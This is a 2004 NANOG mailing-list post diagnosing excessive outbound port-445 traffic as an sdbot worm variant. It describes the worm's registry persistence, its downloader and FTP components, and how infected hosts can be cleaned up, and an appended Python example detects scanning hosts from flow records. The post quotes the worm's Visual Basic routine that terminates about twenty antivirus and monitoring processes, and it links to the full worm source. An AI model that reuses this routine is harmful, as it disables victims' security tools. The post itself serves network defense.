Excessive Internet Traffic

J. Oquendo sil at politrix.org
Wed Sep 15 18:01:25 UTC 2004



// The packets are small, since I am seeing a large number of packets, but
// the bit count is low.
//  30 second input rate 72679000 bits/sec, 41033 packets/sec
//  30 second output rate 29208000 bits/sec, 7687 packets/sec
// Input bits per second are a little above normal, but the packet count
// would normally be under 10000 not 41000.
//
// Ideas?

This is likely a variant of what I foresee to become the "next big pain", a
variant of sdbot, of which McAfee claims there are 4000 variants.

I've had to deal with quite a few (and climbing) users infected with this
pain. We use a Packeteer and have listed comps sending outbound 445
garbage, and I've found that almost all have been infected by one of the
versions of this particular worm. Which of the 4000 versions it is eludes
me.

This is what I've seen so far. If you look at the machine sending the
traffic out, you're likely going to see a smorgasbord of junk in
c:\WINDOWS\system32 ... If you view the folder as a list, then sort by
date, you're likely to find a huge number of executables on the machine,
as well as logs, TFTP information, etc.

You can try opening up task manager but it will be useless...

So, since I'm already getting more and more familiar with this pest, here
is what it does:

/////
Public Sub AVkiller()
On Error Resume Next
'prefix
Dim AVmonz As Variant                                                '
varz:
Dim Cur As String
'---||---
Dim i
'---||---
AVmonz = Array("", "AVP Monitor", _
                   "AntiVir", _
                   "Vshwin", _
                   "F-STOPW", _
                   "F-Secure", _
                   "vettray", _
                   "InoculateIT", _
                   "Norman Virus Control", _
                   "navpw32", _
                   "Norton AntiVirus", _
                   "Iomon98", _
                   "AVG", _
                   "NOD32", _
                   "Dr.Web", _
                   "Amon", _
                   "Trend PC-cillin", _
                   "File Monitor", _
                   "Registry Monitor", _
                   "Registry Editor", _
                   "Task Manager")
'Declaration of AV shitz
For i = 1 To 20
'kill'em all...
 Cur = AVmonz(i)
'convert to string
 Call TerminateTask(Cur)
'terminate task ;)
Next i
End Sub

/////

Nifty, huh? The virus installs itself in the registry under odd names
associated with Microsoft; for example, so far I've seen it installed in a
Run or RunOnce key called Windows Security, Windows Update, etc. There is
no removal tool for this, and since it renders much antivirus software
useless, you can either have a user reinstall Windows, or you can search
the machine for instances of things created on the same date as the
serv32.exe program, or one of the other ones it installs.

Now... The worm seems to perhaps download 4 other programs I've always
seen running in conjunction with it: wupd.exe, which masquerades as
"Windows Update"; ftpd.exe, which opens up an FTP server on the infected
machine and goes around re-downloading various other viruses and worms
onto the infected machine; and one which I believe tries to infect other
machines, perhaps a la the Blaster worm.

Another program seems to randomly rename viruses and worms once they are
downloaded, so for example wupd.exe will probably turn into something like
A032424.exe the next time around, and so on and so forth.

So far, students where I am seem to be getting this via file sharing; one
program which has been sticking out like a sore thumb is something called
ARES. It could also be spreading, again, through some of the katrillion MS
vulnerabilities and perhaps even the newly discovered "Drag and Drop"
vulnerability.

Drag and Drop vulnerabilities
http://secunia.com/advisories/12321/

So now there is also the "bling.exe" issue which is the worm that "sniffs
out passwords" (http://isc.sans.org/diary.php?date=2004-09-12), this one
opens up an irc connection to dump out data to some channel. I will
eventually (when I have some time) hexedit some of these to see what it
does and perhaps repost more information.

For a full view of what serv32.exe does, please check out the code at
http://www.infiltrated.net/wormcode.txt, which lists the original URL
(site down, so it's Google cached).

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
GPG Key ID 0x51F9D78D
Fingerprint 2A48 BA18 1851 4C99 CA22 0619 DB63 F2F7 51F9 D78D
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x51F9D78D

sil @ politrix . org    http://www.politrix.org
sil @ infiltrated . net http://www.infiltrated.net

"How can we account for our present situation unless we
believe that men high in this government are concerting
to deliver us to disaster?" Joseph McCarthy "America's
Retreat from Victory"
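One way to turn the symptoms described in this thread (a high packet rate with tiny packets on the router counters, and hosts spraying outbound 445 at many neighbours) into a check an operator can run over exported flow records. This is an added example written for this archive page, not code from the poster or from the worm; the flow records are constructed, and the thresholds are assumptions to tune for your own network.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    """One outbound flow record (field set constructed for this example)."""
    src: str
    dst: str
    dport: int
    packets: int
    bytes: int


def avg_packet_bytes(bits_per_sec: float, packets_per_sec: float) -> float:
    """Average packet size from a router's rate counters. A high packet rate
    with a small average size points at scan/SYN traffic, not bulk data."""
    return bits_per_sec / packets_per_sec / 8


def find_445_scanners(flows, min_targets=20, max_avg_bytes=128):
    """Return sources that touch many distinct hosts on TCP/445 with very
    small packets: the footprint of a worm probing for file-sharing hosts.
    Thresholds are assumed defaults, not values from the original post."""
    stats = defaultdict(lambda: {"targets": set(), "packets": 0, "bytes": 0})
    for f in flows:
        if f.dport != 445:
            continue
        s = stats[f.src]
        s["targets"].add(f.dst)
        s["packets"] += f.packets
        s["bytes"] += f.bytes
    hits = []
    for src, s in stats.items():
        avg = s["bytes"] / s["packets"] if s["packets"] else 0
        if len(s["targets"]) >= min_targets and avg <= max_avg_bytes:
            hits.append(src)
    return sorted(hits)


# Constructed sample: one host sending 60-byte probes to 60 neighbours on 445,
# one host doing a normal file copy to a single server, plus some web traffic.
SAMPLE_FLOWS = (
    [Flow("10.1.2.3", f"10.1.0.{i}", 445, 1, 60) for i in range(1, 61)]
    + [Flow("10.1.2.4", "10.1.0.5", 445, 300, 240000)]
    + [Flow("10.1.2.4", "192.0.2.10", 80, 40, 30000)]
)

if __name__ == "__main__":
    # The quoted router line: 72679000 bits/sec at 41033 packets/sec
    print("avg bytes/packet:", round(avg_packet_bytes(72679000, 41033)))
    print("suspect hosts:", find_445_scanners(SAMPLE_FLOWS))
```

The file-copy host is not flagged because its 445 traffic goes to one destination with full-size packets; only the host fanning out tiny packets across the subnet is reported.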



More information about the NANOG mailing list